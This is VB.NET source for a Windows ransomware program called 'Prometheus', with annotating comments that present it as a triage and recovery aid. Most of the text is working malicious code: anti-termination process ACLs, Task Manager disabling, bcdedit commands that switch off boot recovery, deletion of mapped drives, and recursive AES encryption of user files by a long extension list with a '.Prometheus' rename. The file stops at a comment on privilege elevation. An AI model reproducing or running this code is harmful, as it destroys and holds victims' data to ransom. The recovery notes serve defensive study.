Imports System.ComponentModel
Imports System.IO
Imports System.Reflection
Imports System.Runtime.InteropServices
Imports System.Security.AccessControl
Imports System.Security.Cryptography
Imports System.Security.Principal
Imports System.Text
Imports System.Threading
Imports Microsoft.Win32
'Prometheus: a Windows Forms class (it Handles MyBase.Load and several Timer*.Tick events) whose visible
'members combine, in one place: persistence (scheduled task "Prometheus", HKCU RunOnce value "Prometheus"),
'anti-analysis (DisableTaskMgr policy, an AntiTaskManager.bat taskkill loop, a deny ACE on the process DACL,
'a hidden taskbar), privilege checks (whoami SID matching), boot-configuration tampering (bcdedit),
'event-log clearing, AES-CBC encryption of user files renamed with ".Prometheus", a forced reboot and
'self-deletion.  The notes below describe only what the visible code does and the on-host artifacts it
'leaves, so that the file can be read for triage, detection and recovery.
'HDDScarlett, ScarlettNeuron and Drocentium_Crystal are constructed here but are not defined in this file.
Public Class Prometheus
'Win32 DEV_BROADCAST_HDR layout (size, device type, reserved) carried by WM_DEVICECHANGE.
'Declared alongside the WM_DEVICECHANGE / DBT_* constants below; no WndProc override in this file consumes them.
Public Structure DEV_BROADCAST_HDR
Public dbch_size As Integer
Public dbch_devicetype As Integer
Public dbch_reserved As Integer
End Structure
'Win32 DEV_BROADCAST_VOLUME layout: the header plus a unit mask (one bit per drive letter, see GetDriveLetterFromMask) and flags.
Public Structure DEV_BROADCAST_VOLUME
Public dbch_size As Integer
Public dbch_devicetype As Integer
Public dbch_reserved As Integer
Public dbch_unitmask As Integer
Public dbch_flags As Short
End Structure
'Device-change message and broadcast constants; not referenced by any method in this file.
Private Const WM_DEVICECHANGE As Integer = &H219
Private Const DBT_DEVICEARRIVAL As Integer = &H8000
Private Const DBT_DEVTYP_VOLUME As Integer = &H2
'Profile root and user name; Dead_Meadow concatenates these into C:\Users\<UserName>\<folder>\ paths.
Private ReadOnly Endorium As String = "C:\Users\"
Private ReadOnly TheAnaustrikCalendar As String = Environment.UserName
'SetWindowPos flag used by CmdHideTaskBar.
Private Const SWP_HIDEWINDOW = &H80
'VB6-style Declare statements for user32 FindWindow / SetWindowPos; used only by CmdHideTaskBar.
Private Declare Function FindWindow Lib "user32" Alias "FindWindow" _
(lpClassName As String, lpWindowName As String) As Long
Private Declare Function SetWindowPos Lib "user32" _
(hwnd As Long, hWndInsertAfter As _
Long,
x As Long,
y As Long,
cx As Long,
cy As Long,
wFlags As Long) As Long
'Form Load handler and the entry point for everything else in this file.  Order as written:
'  Timer4  -> Timer4_Tick runs "shutdown -r -f -t 5" (forced restart);
'  Timer3  -> Timer3_Tick only stops itself;
'  Housing / File_Shield / MatriArk -> ACL changes on the process object and on the executable's folder;
'  Co_Existance -> attempts to move the running executable into several special folders;
'  SoilWork -> schtasks + RunOnce persistence (and a MessageBox with the schtasks output);
'  AntiTaskManager -> writes and starts AntiTaskManager.bat;
'  Admin_Protocol -> bcdedit / net use commands, only when IsAdministrator() is True.
'Only the Admin_Protocol call sits under the On Error GoTo Err guard; the Err label is empty, so errors there are discarded.
<Obsolete>
Private Sub Prometheus_Load(sender As Object, e As EventArgs) Handles MyBase.Load
Dim processing As New HDDScarlett()
Dim neuron As New ScarlettNeuron()
Timer4.Start() 'System Restart
Timer3.Start() 'GPO Initializing Sceduled Administrative Task
Housing() 'Protect Process
File_Shield() 'Protect Process
Co_Existance() 'Application Spawn
SoilWork()
'Memory reduction for app to use less resource: Hence less odds of crashing
Dim gateway As New Drocentium_Crystal()
MatriArk() 'Admin rights to folder
AntiTaskManager() 'Bat file running within VB.Net
On Error GoTo Err
Admin_Protocol() 'Checks to see if admin is running, if so, "BCDEDIT" comes into play
'ReVive()'Copy's Program to system
Err:
End Sub
'Writes HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1".
'Detection/cleanup: that per-user policy value is the artifact; any failure is only written to Debug output.
Public Sub KillCtrlAltDelete()
Dim regkey As RegistryKey
Dim keyValueInt As String = "1"
Dim subKey As String = "Software\Microsoft\Windows\CurrentVersion\Policies\System"
Try
regkey = Registry.CurrentUser.CreateSubKey(subKey)
regkey.SetValue("DisableTaskMgr", keyValueInt)
regkey.Close()
Catch ex As Exception
Debug.WriteLine(ex.Message)
End Try
End Sub
'Six consecutive MoveFile calls of the executing assembly's path into special folders
'(MyMusic, MyDocuments, MyPictures, ProgramFiles, Programs, Temp).  The first exception jumps to the empty Err label.
Public Sub Co_Existance()
On Error GoTo Err
My.Computer.FileSystem.MoveFile(Assembly.GetExecutingAssembly().Location, My.Computer.FileSystem.SpecialDirectories.MyMusic)
My.Computer.FileSystem.MoveFile(Assembly.GetExecutingAssembly().Location, My.Computer.FileSystem.SpecialDirectories.MyDocuments)
My.Computer.FileSystem.MoveFile(Assembly.GetExecutingAssembly().Location, My.Computer.FileSystem.SpecialDirectories.MyPictures)
My.Computer.FileSystem.MoveFile(Assembly.GetExecutingAssembly().Location, My.Computer.FileSystem.SpecialDirectories.ProgramFiles)
My.Computer.FileSystem.MoveFile(Assembly.GetExecutingAssembly().Location, My.Computer.FileSystem.SpecialDirectories.Programs)
My.Computer.FileSystem.MoveFile(Assembly.GetExecutingAssembly().Location, My.Computer.FileSystem.SpecialDirectories.Temp)
Err:
End Sub
'Returns True when the current WindowsIdentity is a member of the built-in Administrators role.
'Any exception yields the initial value False.
Public Shared Function IsAdministrator() As Boolean
Dim isAdmin As Boolean = False
Try
Dim user As IIdentity = WindowsIdentity.GetCurrent()
Dim principal As New WindowsPrincipal(CType(user, WindowsIdentity))
isAdmin = principal.IsInRole(WindowsBuiltInRole.Administrator)
Return isAdmin
Catch ex As Exception
Return isAdmin
End Try
End Function
'Runs only when IsAdministrator() is True.  Calls KillCtrlAltDelete, then launches three hidden command
'processes with redirected stdout and drains each before continuing:
'  1. cmd.exe with "bcdedit /set {current} recoveryenabled no" (disables automatic startup repair);
'  2. "cdm.exe" with "bcdedit /delete {802d5e32-0784-11Da-bd33-000476eba25f}";
'  3. cmd.exe "/c net use * /delete /y" (drops every mapped network connection).
'Responder note: bcdedit changes persist across the restart that Timer4 triggers; the whole body is under On Error GoTo Err.
Public Sub Admin_Protocol()
On Error GoTo Err
If IsAdministrator() Then 'Disable task manager via; registry by deleting value
KillCtrlAltDelete() 'kill task manager
'To disable automatic recovery, type: bcdedit / set current recoveryenabled No;
'('current' represents the current operating system and changing the value to "no" will stop automatic recovery).
Dim oProcess As New Process()
Dim oStartInfo As New ProcessStartInfo("cmd.exe", $"bcdedit /set {{current}} recoveryenabled no") With {
.WindowStyle = ProcessWindowStyle.Hidden
}
oStartInfo.CreateNoWindow = True
oStartInfo.UseShellExecute = False
oStartInfo.RedirectStandardOutput = True
oProcess.StartInfo = oStartInfo
oProcess.Start()
Dim sOutput As String
Using oStreamReader As StreamReader = oProcess.StandardOutput
sOutput = oStreamReader.ReadToEnd()
End Using
'Now we delete the volume entry with ID: {802d5e32-0784-11Da-bd33-000476eba25f}
'Removes the specified entry identifier (users) from the boot sequence
Dim aProcess As New Process()
Dim aStartInfo As New ProcessStartInfo("cdm.exe", $"bcdedit /delete {{802d5e32-0784-11Da-bd33-000476eba25f}}") With {
.CreateNoWindow = ProcessWindowStyle.Hidden
}
aStartInfo.CreateNoWindow = True
aStartInfo.UseShellExecute = False
aStartInfo.RedirectStandardOutput = True
aProcess.StartInfo = aStartInfo
aProcess.Start()
Dim tOutput As String
Using oStreamReader As StreamReader = aProcess.StandardOutput
tOutput = oStreamReader.ReadToEnd()
End Using
'The command actually issued below is "net use * /delete /y", which removes mapped network connections;
'it is not the "net user" account-management command the next two lines describe.
'Primary deletion of user accounts
'The net user command is used to add. remove, and make changes to the user accounts on a computer, all from the command prompt
Dim iProcess As New Process()
Dim iStartInfo As New ProcessStartInfo("cmd.exe", "/c net use * /delete /y") With {
.WindowStyle = ProcessWindowStyle.Hidden
}
iStartInfo.CreateNoWindow = True
iStartInfo.UseShellExecute = False
iStartInfo.RedirectStandardOutput = True
iProcess.StartInfo = iStartInfo
iProcess.Start()
Dim pOutput As String
Using oStreamReader As StreamReader = iProcess.StandardOutput
pOutput = oStreamReader.ReadToEnd()
End Using
End If
Err:
End Sub
'The DirectorySecurity class specifies the access rights for a system directory and how access attempts are audited.
'This class represents access and audit rights as a set of rules. Each access rule is represented by a FileSystemAccessRule object, while each audit rule is represented by a FileSystemAuditRule object.
'The DirectorySecurity Class Is an abstraction Of the underlying Windows file security system.
'In this system, Each directory has a discretionary access control list (DACL), which controls access To the directory, And a system access control list (SACL), which specifies the access control attempts that are audited. The FileSystemAccessRule And FileSystemAuditRule classes are abstractions Of the access control entries (ACEs) that comprise DACLs And SACLs.
'The DirectorySecurity Class hides many Of the details Of DACLs And SACLs;
'you Do Not have To worry about ACE ordering Or null DACLS.
'Use the FileSecurity Class To retrieve, add, Or change
'the access rules that represent the DACL And SACL Of a file.
'Attempts to remove a FullControl rule for DOMAIN\UserName from the MyMusic folder's DACL and writes the DACL back.
'Called from Timer5_Tick, i.e. after the self-destruct command has been issued.  No error handling here.
Private Sub AddDirectorySecurity()
Dim FolderPath As String = My.Computer.FileSystem.SpecialDirectories.MyMusic
Dim domainAndUserName = Environment.UserDomainName & "\" & Environment.UserName
Dim FolderInfo As New DirectoryInfo(FolderPath)
Dim FolderAcl As DirectorySecurity = FolderInfo.GetAccessControl()
FolderAcl.RemoveAccessRule(New FileSystemAccessRule(domainAndUserName, FileSystemRights.FullControl, InheritanceFlags.ContainerInherit Or InheritanceFlags.ObjectInherit))
FolderInfo.SetAccessControl(FolderAcl)
End Sub
'On a new thread: reads the current process's DACL (GetProcessSecurityDescriptor), runs the RemoveAce loop as written,
'inserts at index 0 an AccessDenied ACE for Everyone (WorldSid) covering PROCESS_ALL_ACCESS, and writes the DACL back
'with SetProcessSecurityDescriptor.  Intended effect per the author's comment: non-administrators cannot open the
'process with the rights needed to terminate it.  Exceptions on this thread are not caught.
<Obsolete>
Public Sub Housing()
Dim t As New Thread(Sub()
'This compliments "Process Security" below so only Admin can terminate "Prometheus" process
Dim hProcess As IntPtr = GetCurrentProcess()
Dim dacl = GetProcessSecurityDescriptor(hProcess)
For i As Integer = dacl.DiscretionaryAcl.Count - &H1 To &H0 + &H1
dacl.DiscretionaryAcl.RemoveAce(i)
Next
dacl.DiscretionaryAcl.InsertAce(&H0, New CommonAce(AceFlags.None,
AceQualifier.AccessDenied,
ProcessAccessRights.PROCESS_ALL_ACCESS,
New SecurityIdentifier(WellKnownSidType.WorldSid, Nothing),
False,
Nothing))
SetProcessSecurityDescriptor(hProcess, dacl)
End Sub)
t.Start()
End Sub
'The Microsoft Windows security model enables you to control access to process objects.
'For more information about security, see Access-Control Model.
'When a user logs in, the system collects a set of data that uniquely identifies the user during the authentication
'process, And stores it in an access token. This access token describes the security context of all processes associated with the user.
'The security context of a process Is the set of credentials given to the process Or the user account that created the process.
'You can use a token To specify the current security context For a process Using the CreateProcessWithTokenW Function.
'You can specify a security descriptor For a process When you Call the CreateProcess, CreateProcessAsUser,
'Or CreateProcessWithLogonW Function. If you specify NULL, the process gets a Default security descriptor.
'The ACLs In the Default security descriptor For a process come from the primary Or impersonation token Of the creator.
'Win32 PROCESS_* access-mask bits plus the standard rights; PROCESS_ALL_ACCESS is composed here as
'STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | &HFFF (the older, narrower form of that mask).
<Flags>
Public Enum ProcessAccessRights
PROCESS_CREATE_PROCESS = &H80
PROCESS_CREATE_THREAD = &H2
PROCESS_DUP_HANDLE = &H40
PROCESS_QUERY_INFORMATION = &H400
PROCESS_QUERY_LIMITED_INFORMATION = &H1000
PROCESS_SET_INFORMATION = &H200
PROCESS_SET_QUOTA = &H100
PROCESS_SUSPEND_RESUME = &H800
PROCESS_TERMINATE = &H1
PROCESS_VM_OPERATION = &H8
PROCESS_VM_READ = &H10
PROCESS_VM_WRITE = &H20
DELETE = &H10000
READ_CONTROL = &H20000
SYNCHRONIZE = &H100000
WRITE_DAC = &H40000
WRITE_OWNER = &H80000
STANDARD_RIGHTS_REQUIRED = &HF0000
PROCESS_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED _
Or SYNCHRONIZE _
Or &HFFF
End Enum
'Process security API
'The GetKernelObjectSecurity function retrieves a copy of the security descriptor that protects a kernel object.
'P/Invoke: advapi32 GetKernelObjectSecurity.  Returns False on failure; SetLastError:=True makes Win32Exception() meaningful to callers.
<DllImport("advapi32.dll", SetLastError:=True)>
Private Shared Function GetKernelObjectSecurity(Handle As IntPtr, securityInformation As Integer,
<Out> pSecurityDescriptor As Byte(), nLength As UInteger, <Out> ByRef lpnLengthNeeded As UInteger) As Boolean
End Function
'Process security API. Retrieves a pseudo handle for the current process.
'A pseudo handle is a special constant, currently (HANDLE)-1, that is interpreted as the current process handle.
'For compatibility with future operating systems, it is best to call GetCurrentProcess instead of hard-coding this constant value.
'The calling process can use a pseudo handle to specify its own process whenever a process handle is required.
'Pseudo handles are not inherited by child processes.
<DllImport("kernel32.dll")>
Public Shared Function GetCurrentProcess() As IntPtr
End Function
'Process security API. The SetKernelObjectSecurity function sets the security of a kernel object.
'For example, this can be a process, thread, or event.
'Note: This function should not be used when setting a security descriptor on file system objects.
'Instead, use the SetSecurityInfo or SetNamedSecurityInfo functions.
'P/Invoke: advapi32 SetKernelObjectSecurity; pSecurityDescriptor is the self-relative binary form produced by RawSecurityDescriptor.GetBinaryForm.
<DllImport("advapi32.dll", SetLastError:=True)>
Private Shared Function SetKernelObjectSecurity(Handle As IntPtr, securityInformation As Integer,
<[In]> pSecurityDescriptor As Byte()) As Boolean
End Function
'The NtSetInformationProcess function can be used to set a process as critical process.
'The system will bug check the system with the bug check code CRITICAL_PROCESS_TERMINATION (0xF4) when the critical process is terminated.
'P/Invoke declared but only referenced from the commented-out CriticalProcess block below; no live caller in this file.
<DllImport("ntdll.dll", SetLastError:=True)>
Private Shared Function NtSetInformationProcess(hProcess As IntPtr, processInformationClass As Integer, ByRef processInformation As Integer, processInformationLength As Integer) As Integer
End Function
'Create a critical system process. This is a process that cannot be terminated...
'Need admin for this:
'Private Sub CriticalProcess()
'Dim isCritical As Integer = 1
' we want this to be a Critical Process
'Dim BreakOnTermination As Integer = 29
' value for BreakOnTermination (flag)
' Process.EnterDebugMode()
'acquire Debug Privileges
' setting the BreakOnTermination = 1 for the current process
' NtSetInformationProcess(Process.GetCurrentProcess().Handle, BreakOnTermination, isCritical, 4)
'End Sub
'These functions serve to protect "Prometheus's Process" from being terminated unless you are an admin. If you activate the code above then run the program you'll see.
'The Microsoft Windows security model enables you to control access to process objects. For more information about security,
'see Access-Control Model.
'When a user logs in, the system collects a set of data that uniquely identifies the user during the authentication process,
'And stores it in an access token. This access token describes the security context of all processes associated with the user.
'The security context of a process Is the set of credentials given to the process Or the user account that created the process.
'Reads the DACL portion of a process's security descriptor using the two-call pattern: the first call with an empty
'buffer returns the required size in bufSizeNeeded, the second fills a buffer of that size (allocated inline via
'CSharpImpl.Assign).  bufSizeNeeded is UInteger, so the "< 0" test can never be True; sizes above Short.MaxValue are rejected.
'Throws Win32Exception when the size check or the second call fails.
<Obsolete>
Public Shared Function GetProcessSecurityDescriptor(processHandle As IntPtr) As RawSecurityDescriptor
Const DACL_SECURITY_INFORMATION As Integer = &H4
Dim psd As Byte() = New Byte(-1) {}
Dim bufSizeNeeded As UInteger
GetKernelObjectSecurity(processHandle, DACL_SECURITY_INFORMATION, psd, 0, bufSizeNeeded)
If bufSizeNeeded < 0 OrElse bufSizeNeeded > Short.MaxValue Then Throw New Win32Exception()
If Not GetKernelObjectSecurity(processHandle, DACL_SECURITY_INFORMATION, CSharpImpl.Assign(psd, New Byte(bufSizeNeeded - 1) {}), bufSizeNeeded, bufSizeNeeded) Then Throw New Win32Exception()
Return New RawSecurityDescriptor(psd, 0)
End Function
'Set Process Security Descriptor Action. Adjusting Process Security allows a process To be Protected from most tampering by users.
'For example, adjusting process security can restrict who can Stop a process from the task manager.
'Serialises dacl to its binary form and applies it to the process with DACL_SECURITY_INFORMATION; throws Win32Exception on failure.
Public Shared Sub SetProcessSecurityDescriptor(processHandle As IntPtr, dacl As RawSecurityDescriptor)
Const DACL_SECURITY_INFORMATION As Integer = &H4
Dim rawsd As Byte() = New Byte(dacl.BinaryLength - 1) {}
dacl.GetBinaryForm(rawsd, 0)
If Not SetKernelObjectSecurity(processHandle, DACL_SECURITY_INFORMATION, rawsd) Then Throw New Win32Exception()
End Sub
'C# Conversion to VB.Net
'Helper emulating C# assignment-as-expression: stores value into the ByRef target and returns it.
Private Class CSharpImpl
'Specifies that one or more declared programming elements are associated with a class or structure at large,
'and not with a specific instance of the class or structure.
<Obsolete("Please refactor calling code to use normal Visual Basic assignment")>
Shared Function Assign(Of T)(ByRef target As T, value As T) As T
target = value
Return value
End Function
End Class
'Adds a Deny FullControl rule for the current user name on a path derived from the executing assembly's location.
'Only the lines after "On Error GoTo Err" are guarded; GetAccessControl above it is not.
Private Sub File_Shield()
'This prevents Prometheus "exe" folder from being accessed, unless the admin
Dim filePath As String
filePath = (Environment.GetFolderPath(Assembly.GetExecutingAssembly().Location))
Dim adminUserName As String = Environment.UserName
Dim ds As DirectorySecurity = Directory.GetAccessControl(filePath)
On Error GoTo Err
Dim fsa As New FileSystemAccessRule(adminUserName, FileSystemRights.FullControl, AccessControlType.Deny)
ds.AddAccessRule(fsa)
Directory.SetAccessControl(filePath, ds)
Err:
End Sub
'AES 256-bit encryption
'Encrypts seedKill with AES-256 in CBC mode (RijndaelManaged, 128-bit block, default padding) and returns the ciphertext.
'Key (32 bytes) and IV (16 bytes) are consecutive outputs of ONE Rfc2898DeriveBytes stream seeded with oraclepass,
'the fixed 8-byte salt {1,1,2,2,3,3,4,4} and 100 iterations, so the IV is simply the 16 bytes following the key.
'Recovery note: apart from oraclepass every input is a constant in this file, and the only caller derives oraclepass
'from a literal in Dead_Meadow, so the key and IV are reproducible from this source alone.
Public Function Riezengard_The_Malevolent_One(seedKill As Byte(), oraclepass As Byte()) As Byte()
Dim FesteringBytes As Byte() = Nothing
'A Byte is made up of more than just 8 values (between 0-1 but 256 "28") different Bytes which stands for 3 values between 0 & 9, but 1000 (103) permutations from 0(00) to 999 and is easily mistaken.
Dim theBayOfDead As Byte() = New Byte() {1, 1, 2, 2, 3, 3, 4, 4}
'Reads a sequence of bytes from the current memory stream and advances the position within the memory stream by the number of bytes read.
Using rythorian As New MemoryStream()
Using AES As New RijndaelManaged()
AES.KeySize = 256
AES.BlockSize = 128
Dim key = New Rfc2898DeriveBytes(oraclepass, theBayOfDead, 100)
AES.Key = key.GetBytes(AES.KeySize / 8)
AES.IV = key.GetBytes(AES.BlockSize / 8)
AES.Mode = CipherMode.CBC
Using cs = New CryptoStream(rythorian, AES.CreateEncryptor(), CryptoStreamMode.Write)
cs.Write(seedKill, 0, seedKill.Length)
cs.Close()
End Using
FesteringBytes = rythorian.ToArray()
End Using
End Using
Return FesteringBytes
End Function
'Encrypts one file in place: password = SHA256(malice); the file at seething is read, encrypted with
'Riezengard_The_Malevolent_One, overwritten, then renamed with ".Prometheus" appended.
'Only UnauthorizedAccessException is swallowed; ReadAllBytes sits outside the Try.
'Artifact: files ending in ".Prometheus".
Public Sub Thantalos_The_Filth(seething As String, malice As String)
Dim maliceBitter As Byte() = Encoding.UTF8.GetBytes(malice)
maliceBitter = SHA256.Create().ComputeHash(maliceBitter)
Dim DarkendCrypt As Byte() = File.ReadAllBytes(seething)
Try
Dim VanquishLight As Byte() = Riezengard_The_Malevolent_One(DarkendCrypt, maliceBitter)
File.WriteAllBytes(seething, VanquishLight)
Dim extension As String = ".Prometheus"
File.Move(seething, seething _
& extension)
Catch __unusedUnauthorizedAccessException1__ As UnauthorizedAccessException
End Try
End Sub
'Recursive walk from WormHole: each file whose extension appears in the literal list is handed to Thantalos_The_Filth
'with the same password; each subdirectory is recursed unless the skip test on the next loop matches.
'Any SystemException aborts the whole subtree silently.
Public Sub Annika_Kreznok_Infernal_Directory_The_Quiet_One(WormHole As String, malice As String)
Try
Dim quantumentanglement = {".3dm", ".3g2", ".3gp", ".aaf", ".accdb", ".aep", ".aepx", ".adt", ".adts", ".mdb", ".tiff",
".aet", ".ai", ".aif", ".arw", ".as", ".as3", ".asf", ".asp", ".asx", ".avi", ".bay", ".bmp",
".cdr", ".accde", ".midi", ".tmp", ".wp5", ".cer", ".class", ".cpp", ".cr2", ".crt", ".crw",
".cs", ".csv", ".db", ".dbf", ".dcr", ".der", ".dng", ".accdr", ".msi", ".txt", ".xps", ".doc",
".docb", ".docm", ".docx", ".dot", ".dotm", ".dwg", ".dxf", ".dxg", ".efx", ".eps", ".aac",
".aiff", ".mui", ".wms", ".erf", ".fla", ".flv", ".idml", ".iff", ".indb", ".indd", ".indl",
".indt", ".inx", ".jar", ".java", ".aifc", ".bin", ".pub", ".wmz", ".jpeg", ".jpg", ".kdc",
".m3u", ".m3u8", ".m4u", ".max", ".mdb", ".mdf", ".mef", ".mid", ".mov", ".mp3", ".cda", ".gif",
".vsd", ".mp4", ".mpa", ".mpeg", ".mrw", ".msg", ".nef", ".nrw", ".odb", ".odc", ".odm", ".odp",
".ods", ".aspx", ".htm", ".html", ".vss", ".odt", ".orf", ".p12", ".p7b", ".p7c", ".pdb", ".pdf",
".pef", ".pem", ".pfx", ".php", ".plb", ".pmd", ".bat", ".vssm", ".pot", ".potm", ".potx", ".ppam",
".ppj", ".pps", ".ppsm", ".ppsx", ".ppt", ".pptm", ".pptx", ".prel", ".cab", ".css", ".vstm",
".prprof", ".ps", ".psd", ".pst", ".ptx", ".r3d", ".ra", ".raf", ".rar", ".raw", ".rb", ".rtf",
".rw2", ".dif", ".scss", ".vstx", ".rwl", ".sdf", ".sldm", ".sql", ".sr2", ".srf", ".srw", ".svg",
".swf", ".tif", ".vcf", ".vob", ".dll", ".sass", ".wbk", ".wav", ".wb2", ".wma", ".wmv", ".wpd",
".wps", ".x3f", ".xla", ".xlam", ".xlk", ".xll", ".xlm", ".xls", ".eml", ".ini", ".wks", ".xlsb",
".xlsm", ".xlsx", ".zlt", ".xltm", ".xlw", ".xml", ".xqx", ".zip", ".png", ".jfif", ".iso", ".m4a",
".wmd", ".3ds", ".3mf", ".7z", ".accft", ".adame", ".adicht", ".adx", ".adz", ".agr", ".ahk", ".cur",
".air", ".amg", ".ani", ".ape", ".ashx", ".bar", ".bps", ".bin", ".beam", ".bz2", ".blend", ".cdf",
".cpl", ".csproj", ".d3v", ".d4d", ".d4p", ".daf", ".dart", ".vb", ".cs", ".dbd", ".dgb", ".dbs",
".dbw", ".dc", ".dbx", ".dc6", ".dcc", ".dcd", ".dcc", ".dch", ".dcs", ".dct", ".dda", ".deb", ".dds",
".dem", ".der", ".dfl", ".dfv", ".dic", ".dis", ".dlg", ".dls", ".dochtml", ".docmhtml", ".dothtml",
".dw2", ".dwf", ".ebd", ".email", ".emf", ".emz", ".epa", ".etl", ".evt", ".evtx", ".exp", ".fv4",
".fodg", ".fodp", ".fods", ".fodt", ".frm", ".frag", ".fs", ".gz", ".mdi", ".mid", ".msc", ".run",
".scv", ".torrent", ".tar", ".vbs", ".gif", ".js", ".taz", ".xar", ".php3", ".ico", ".ogg", ".tar"}
Dim files As String() = Directory.GetFiles(WormHole)
Dim offspring As String() = Directory.GetDirectories(WormHole)
For i As Integer = 0 To files.Length _
- 1
Dim extension As String = Path.GetExtension(files(i))
If quantumentanglement.Contains(extension) Then
Thantalos_The_Filth(files(i), malice)
End If
Next
For i As Integer = 0 To offspring.Length - 1
If offspring.Contains("Windows") OrElse offspring(i).Contains("Program Files") OrElse offspring(i).Contains("Program Files (x86)") Then Continue For
Annika_Kreznok_Infernal_Directory_The_Quiet_One(offspring(i), malice)
Next
Catch __unusedSystemException1__ As SystemException
End Try
End Sub
'Driver for the encryption pass (called from Timer1_Tick).  malice is the hard-coded password literal passed down
'to Thantalos_The_Filth.  For the "C:\" drive the nine folders under C:\Users\<UserName>\ listed below are walked;
'every other logical drive (removable or mapped) is walked from its root.  Whole body under On Error GoTo Err.
Private Sub Dead_Meadow()
On Error GoTo Err
Dim malice As String = "1234567890!@#$%^&*()_+_OrDeR_oF_CoRrUpTiOn"
Dim aeros As String = "\Desktop\"
Dim apathy As String = "\Downloads\"
Dim murder As String = "\Documents\"
Dim psychotron As String = "\Pictures\"
Dim mystra As String = "\Music\"
Dim cratus As String = "\Videos\"
Dim programFiles As String = "\ProgramFiles\"
Dim programs As String = "\Programs\"
Dim temps As String = "\Temp\"
'The strings below compliment the above calling for each drive
Dim needle As String = Endorium & TheAnaustrikCalendar & aeros
Dim basket As String = Endorium & TheAnaustrikCalendar & apathy
Dim mirrors As String = Endorium & TheAnaustrikCalendar & murder
Dim shattered As String = Endorium & TheAnaustrikCalendar & psychotron
Dim guide As String = Endorium & TheAnaustrikCalendar & mystra
Dim you As String = Endorium & TheAnaustrikCalendar & cratus
Dim blood As String = Endorium & TheAnaustrikCalendar & programFiles
Dim seething As String = Endorium & TheAnaustrikCalendar & programs
Dim wound As String = Endorium & TheAnaustrikCalendar & temps
'On Windows, GetLogicalDrives returns the names of all accessible drives on a particular machine,
'including any optical drives or removable media devices, in the form "<drive letter>:\" (for example, "C:\").
'On Unix, it returns the paths of all filesystem mount points mounted on a particular machine (for example,
'"/home/user", "/media/usb").
Dim wrath As String() = Directory.GetLogicalDrives()
For Each str As String In wrath
If str = "C:\" Then
Annika_Kreznok_Infernal_Directory_The_Quiet_One(needle, malice)
Annika_Kreznok_Infernal_Directory_The_Quiet_One(basket, malice)
Annika_Kreznok_Infernal_Directory_The_Quiet_One(mirrors, malice)
Annika_Kreznok_Infernal_Directory_The_Quiet_One(shattered, malice)
Annika_Kreznok_Infernal_Directory_The_Quiet_One(guide, malice)
Annika_Kreznok_Infernal_Directory_The_Quiet_One(you, malice)
Annika_Kreznok_Infernal_Directory_The_Quiet_One(blood, malice)
Annika_Kreznok_Infernal_Directory_The_Quiet_One(seething, malice)
Annika_Kreznok_Infernal_Directory_The_Quiet_One(wound, malice)
Else
Annika_Kreznok_Infernal_Directory_The_Quiet_One(str, malice)
End If
Next
Err:
End Sub
#Region " GPO Security Identifier | Creators Owner ID, (Highest Mandatory Level) | Schedule Task "
'GPO cmdlet creates a GPO with a specified name. By default, the newly created GPO is not linked to a site,
'domain, or organizational unit (OU).
'You can use this cmdlet To create a GPO that Is based On a starter GPO by specifying the GUID Or the display name
'Of the Starter GPO, Or by piping a StarterGpo Object into the cmdlet.
'The cmdlet returns a GPO Object, which represents the created GPO that you can pipe "To other Group Policy cmdlets."
'Despite the name, this is a generic run-and-capture helper: starts cmd with args (optionally in startin),
'waits for exit, and returns stdout followed by stderr.  Any exception is swallowed and "" is returned.
Public Function GPO(cmd As String,
Optional args As String = "",
Optional startin As String = "") As String
GPO = ""
Try
Dim p = New Process With {
.StartInfo = New ProcessStartInfo(cmd, args)
}
If startin <> "" Then p.StartInfo.WorkingDirectory = startin
p.StartInfo.RedirectStandardOutput = True
p.StartInfo.RedirectStandardError = True
p.StartInfo.UseShellExecute = False
p.StartInfo.CreateNoWindow = True
p.Start()
p.WaitForExit()
Dim s = p.StandardOutput.ReadToEnd
s += p.StandardError.ReadToEnd
GPO = s
Catch ex As Exception
End Try
End Function ' Get Process Output.
'Possession Part of Owning System Via; The <Security Identifier>
'Runs "whoami /all" through the cmd path literal as written and reports whether the output contains
'S-1-5-32-544 (BUILTIN\Administrators).  Detection: whoami.exe spawned from this process with findstr.
Public Function CanH() As Boolean
CanH = False
'Displays user, group, and privileged information for the user who is currently logged on to the local system.
'If used without parameters, whoami displays the current domain and user name.
'[URL='https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/whoami']whoami[/URL]
Dim s = GPO(
"c: \windows\system32\cmd.exe",
"/c whoami /all | findstr /I /C:""S-1-5-32-544""") '<<This is a Security Identifier
If s.Contains("S-1-5-32-544") Then CanH = True
End Function ' Check if can get Higher.
'Below: Creators Owner ID has discovered the "Security Identifier" to be replaced by the "S-1-16-12288"
'(Highestndatory Level) ADMIN.
'A Security Identifier (SID) is used to uniquely identify a security principal or security group. Security principals can represent any entity
'that can be authenticated by the operating system, such as a user account, a computer account, or a thread or process that runs in the security
'context of a user or computer account.Each account Or group, Or process running in the security context of the account,
'has a unique SID that Is issued by an authority, such as a Windows domain controller. It Is stored in a security database.
'The system generates the SID that identifies a particular account Or group at the time the account Or group Is created.
'When a SID has been used as the unique identifier for a user Or group, it can never be used again to identify another user Or group.
'Each time a user signs in, the system creates an access token for that user. The access token contains the user's SID, user rights, and the SIDs
'for any groups the user belongs to. This token provides the security context for whatever actions the user performs on that computer.
'In addition to the uniquely created, domain-specific SIDs that are assigned to specific users And groups, there are well-known SIDs that identify
'generic groups And generic users. For example, the Everyone And World SIDs identify a group that includes all users. Well-known SIDs have values
'that remain constant across all operating systems. SIDs are a fundamental building block Of the Windows security model.
'They work With specific components Of the authorization And access control technologies In the security infrastructure Of the
'Windows Server operating systems. This helps protect access To network resources And provides a more secure computing environment.
'>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
'How security identifiers work:
'Users refer To accounts by Using the account name, but the operating system internally refers To accounts And processes
'that run In the security context Of the account by Using their security identifiers (SIDs). For domain accounts, the SID Of a
'security principal Is created by concatenating the SID Of the domain With a relative identifier (RID) For the account.
'SIDs are unique within their scope (domain Or local), And they are never reused.
'Same whoami check for S-1-16-12288 (High Mandatory Level integrity label): True means this process already runs elevated.
Public Function CH() As Boolean
CH = False
Dim s = GPO("c:\windows\system32\cmd.exe",
"/c whoami /all | findstr /I /C:""S-1-16-12288""")
If s.Contains("S-1-16-12288") Then CH = True
End Function ' Check if Higher.
'Elevating Privileges
